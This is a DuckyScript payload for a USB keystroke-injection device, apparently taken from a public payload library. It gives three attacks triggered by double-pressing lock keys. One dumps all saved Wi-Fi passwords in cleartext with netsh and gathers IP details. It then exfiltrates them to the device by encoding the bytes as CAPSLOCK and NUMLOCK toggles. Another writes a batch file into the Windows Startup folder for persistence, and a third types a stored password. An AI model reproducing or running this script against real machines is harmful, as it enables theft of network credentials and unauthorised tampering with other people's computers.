Path: blob/master/payloads/library/general/3_Payload_Menu/payload.txt
2968 views
REM Three Payloads from LOCK Key Double Press.1REM Author: RootJunky2REM COMPATABILITY: Windows3REM DuckyScript 3.045REM set password6DEFINE PASS mypassword78REM Stop and Start the while loop during payload execution with VAR 1 and 2.9VAR $stopstart = 11011REM SCROLLLOCK Payload12FUNCTION FUN1()13$stopstart = 214WAIT_FOR_SCROLL_CHANGE15DELAY 100016STRING PASS17ENTER18LED_R19DELAY 100020LED_OFF21$stopstart = 122END_FUNCTION2324REM NUMLOCK Payload25FUNCTION FUN2()26$stopstart = 227WAIT_FOR_NUM_CHANGE28DELAY 50029GUI r30DELAY 100031STRING Powershell32DELAY 50033ENTER34DELAY 100035STRING $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content36ENTER37STRING $PublicIP = "Your-Public-IP-Address"38ENTER39STRING $LocalIP = "Your-Local-IP-Address"40ENTER41STRING $computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}42ENTER43STRING $Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}44ENTER45STRING $Wifi = (netsh wlan show profiles) | Select-String ":(.+)$" | % {$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | % {$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize46ENTER47STRING $Wifi + $PublicIP + $computerPubIP + $LocalIP + $Networks.ipaddress[0] > $env:tmp\z48ENTER49STRING clear50ENTER51SAVE_HOST_KEYBOARD_LOCK_STATE52STRING $Wifi + $PublicIP + $computerPubIP + $LocalIP + $Networks.ipaddress[0] + (echo "Press NUMLOCK now to EXFIL this data, you have 5 seconds.")53ENTER54STRING timeout 555ENTER56DELAY 600057STRING EXIT58REM This only runs if NUMLOCK is press in the 5 second window.59IF $_NUMLOCK_ON THEN60$_EXFIL_MODE_ENABLED = TRUE61$_EXFIL_LEDS_ENABLED = TRUE6263REM Convert the stored credentials into CAPSLOCK and NUMLOCK values.64GUI r65DELAY 10066STRING powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80,67STRING 0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else68STRING {$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\z"69ENTER70DELAY 1007172REM Use powershell to inject the CAPSLOCK and NUMLOCK values to the Ducky.73GUI r74DELAY 10075STRING powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms;76STRING [System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z"77ENTER78DELAY 1007980REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.81WAIT_FOR_SCROLL_CHANGE82LED_G83$_EXFIL_MODE_ENABLED = FALSE84RESTORE_HOST_KEYBOARD_LOCK_STATE85END_IF86LED_R87DELAY 100088LED_OFF89$stopstart = 190END_FUNCTION9192REM Capslock payload93FUNCTION FUN3()94$stopstart = 295WAIT_FOR_CAPS_CHANGE96DELAY 50097GUI r98DELAY 50099STRING cmd100DELAY 500101ENTER102DELAY 1000103STRING ECHO echo off > "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat"104DELAY 500105ENTER106STRING ECHO mode con:cols=30 lines=10 >> "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat"107DELAY 500108ENTER109STRING ECHO start https://youtu.be/sXwaRjU7Tj0?t=57 >> "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat"110DELAY 500111ENTER112STRING ECHO exit >> "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat"113DELAY 500114ENTER115STRING exit116ENTER117LED_R118DELAY 1000119LED_OFF120$stopstart = 1121END_FUNCTION122123REM place all lock keys in the off state to start the payload correctly.124FUNCTION SETUP()125SAVE_HOST_KEYBOARD_LOCK_STATE126DELAY 500127IF ( $_NUMLOCK_ON == TRUE ) THEN128NUMLOCK129DELAY 500130END_IF131IF ( $_SCROLLLOCK_ON == TRUE ) THEN132SCROLLLOCK133DELAY 500134END_IF135IF ( $_CAPSLOCK_ON == TRUE ) THEN136CAPSLOCK137DELAY 500138END_IF139END_FUNCTION140141REM SCROLLLOCK on to enable button description on ducky startup.142SAVE_HOST_KEYBOARD_LOCK_STATE143DELAY 1000144IF ( $_SCROLLLOCK_ON == TRUE ) THEN145DELAY 500146GUI r147DELAY 1000148STRING powershell149DELAY 500150ENTER151DELAY 1000152STRING $groups = ('CAPSLOCK = RickRoll','SCROLLLOCK = Password','NUMLOCK = WiFi Password and EXFIL','Double press any of these keys to run the payloads.')153ENTER154STRING $groups = $groups -join "`n- "155ENTER156STRING powershell -WindowStyle hidden -Command "& {[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('- $groups','DUCKY USAGE')}"157ENTER158SETUP()159ELSE IF160SETUP()161END_IF162163REM Constantly monitor scrolllock, numlock, and capslock keys with a while loop.164WHILE ( $stopstart == 1 )165REM Call FUNCTION 1 with scrolllock press.166IF ($_SCROLLLOCK_ON == TRUE) THEN167FUN1()168REM Call FUNCTION 2 with numlock press.169ELSE IF ($_NUMLOCK_ON == TRUE) THEN170FUN2()171REM Call FUNCTION 3 with capslock press.172ELSE IF ($_CAPSLOCK_ON == TRUE) THEN173FUN3()174END_IF175END_WHILE176177178